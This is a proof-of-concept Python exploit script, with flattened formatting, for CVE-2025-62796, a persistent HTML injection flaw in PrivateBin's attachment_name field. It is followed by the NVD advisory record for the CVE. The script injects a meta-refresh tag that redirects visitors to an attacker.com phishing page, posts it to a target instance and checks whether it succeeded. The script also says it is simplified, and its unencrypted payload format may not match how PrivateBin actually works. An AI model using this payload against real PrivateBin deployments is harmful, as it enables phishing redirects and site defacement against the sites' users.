CVE-2025-62796

import requests import json # CVE-2025-62796 PoC - PrivateBin HTML Injection via attachment_name # This PoC demonstrates how to inject arbitrary HTML via attachment_name TARGET_URL = "https://privatebin-instance.net/" def create_malicious_paste(): """ Create a paste with malicious attachment_name containing HTML injection payload. The payload uses meta refresh tag to redirect users to attacker-controlled site. """ injection_payload = '<meta http-equiv="refresh" content="0;url=https://attacker.com/phishing">' # PoC payload structure for PrivateBin API # Note: This is a simplified demonstration of the vulnerability concept paste_data = { "v": 2, "adata": [], "meta": { "attachment_name": injection_payload, "attachment_size": 1024 }, "hide": False } headers = { "Content-Type": "application/json", "X-Requested-With": "JSONHttpRequest" } try: response = requests.post( f"{TARGET_URL}", data=json.dumps(paste_data), headers=headers ) print(f"[*] Response Status: {response.status_code}") return response.json() except Exception as e: print(f"[!] Error: {e}") return None def verify_injection(paste_id): """ Verify that the HTML injection was successful by checking the paste content. """ try: response = requests.get(f"{TARGET_URL}?pasteid={paste_id}&format=json") data = response.json() # Check if attachment_name is rendered without escaping if '<meta http-equiv="refresh"' in str(data): print("[!] VULNERABLE: HTML injection successful!") return True else: print("[*] SAFE: Injection payload was sanitized") return False except Exception as e: print(f"[!] Error verifying: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-62796 PoC - PrivateBin HTML Injection") print("=" * 60) result = create_malicious_paste() if result and "id" in result: print(f"[*] Paste created with ID: {result['id']}") verify_injection(result['id'])

{"cve": {"id": "CVE-2025-62796", "sourceIdentifier": "[email protected]", "published": "2025-10-28T21:15:40.760", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Versions 1.7.7 through 2.0.1 allow persistent HTML injection via the unsanitized attachment filename (attachment_name) when attachments are enabled. An attacker can modify attachment_name before encryption so that, after decryption, arbitrary HTML is inserted unescaped into the page near the file size hint, enabling redirect (e.g., meta refresh) and site defacement and related phishing attacks. Script execution is normally blocked by the recommended Content Security Policy, limiting confidentiality impact. The issue was introduced in 1.7.7 and fixed in 2.0.2. Update to 2.0.2 or later. Workarounds include enforcing the recommended CSP, deploying PrivateBin on a separate domain, or disabling attachments."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e", "source": "[email protected]"}, {"url": "https://github.com/PrivateBin/PrivateBin/pull/1550", "source": "[email protected]"}, {"url": "https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g", "source": "[email protected]"}]}}